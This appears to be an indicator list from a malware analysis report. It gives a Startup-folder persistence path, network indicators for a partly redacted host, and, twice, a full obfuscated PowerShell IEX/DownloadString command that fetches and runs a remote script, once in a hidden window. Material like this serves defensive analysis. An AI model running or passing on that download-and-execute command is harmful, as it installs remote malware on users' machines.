Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\file.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrinG'('ht'+'tp://concretium.pt/d')
- 'co###etium.pt':80
- http://co###etium.pt/d
- http://co###etium.pt/File
- DNS ASK co###etium.pt
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrinG'('ht'+'tp://concretium.pt/d')' (with hidden window)